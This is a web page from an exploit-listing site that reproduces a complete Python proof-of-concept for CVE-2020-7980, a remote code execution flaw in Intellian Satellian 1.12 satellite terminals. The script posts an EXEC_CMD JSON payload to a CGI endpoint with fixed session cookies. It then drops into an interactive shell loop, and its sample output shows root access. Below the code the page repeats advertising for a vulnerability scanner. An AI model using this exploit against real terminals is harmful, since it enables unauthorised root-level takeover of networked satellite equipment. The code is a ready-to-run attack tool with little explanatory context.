satellian 1.12 remote code execution

▸▸▸ Exploit & Vulnerability >>   webapps exploit & hardware vulnerability




satellian 1.12 remote code execution Code Code...
				
# Exploit Title: Satellian 1.12 - Remote Code Execution # Date: 2020-01-28 # Exploit Author: Xh4H # Vendor Homepage: https://www.intelliantech.com/?lang=en # Version: v1.12+ # Tested on: Kali linux, MacOS # CVE : CVE-2020-7980 # Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980 # xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted> # ________________________________________ # (__) / \ # (oo) ( Intellian Satellite Terminal PoC ) # /-------\/ --' \________________________________________/ # / | || # * ||----|| # Performing initial scan. Listing available system binaries. # Starting request to http://<redacted> # Executing command /bin/ls /bin # acu_server # acu_tool # addgroup # adduser # ... # Satellian $ id # uid=0(root) gid=0(root) import requests import argparse import sys import calendar import time from termcolor import colored def cprint(text, color): # colored print sys.stdout.write(colored(text + "\n", color, attrs=["bold"])) def httpize(url): if not url.startswith("http"): cprint("Missing protocol, using http . . .", "yellow") url = "http://" + url return url def send_command(url, command, verbose): RCE = {"O_":"A","V_":1,"S_":123456789,"F_":"EXEC_CMD","P1_":{"F":"EXEC_CMD","Q":command}} string_to_split = '''"SUCCESS_" },''' if verbose: cprint("Starting request to %s" % url, "yellow") cprint("Executing command %s" % command, "yellow") a = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'}) command_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '') if len(command_output) < 4 and verbose: cprint("Target doesn't seem to be vulnerable\nExiting.", 'red') sys.exit() print command_output cprint(""" ________________________________________ (__) / \\ (oo) ( Intellian Satellite Terminal PoC ) /-------\\/ --' \\________________________________________/ / | || * ||----|| """, "green") parser = argparse.ArgumentParser(description="Satellian: A PoC script for CVE-2020-7980") parser.add_argument("-u", "--url", help="Base url") args = parser.parse_args() if args.url is None: cprint("Missing arguments.\nUsage example:\n" + sys.argv[0] + " -u http://10.10.10.14\n", "red") sys.exit() url = httpize(args.url) def main(): cprint("Performing initial scan. Listing available system binaries.", "green") send_command(url, '/bin/ls /bin', True) while True: command = raw_input('Satellian $ ') send_command(url, command, False) if __name__ == '__main__': try: main() except Exception as e: print e print "\nAn error happened."

Satellian 1.12 remote code execution Vulnerability / Exploit Source : Satellian 1.12 remote code execution



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.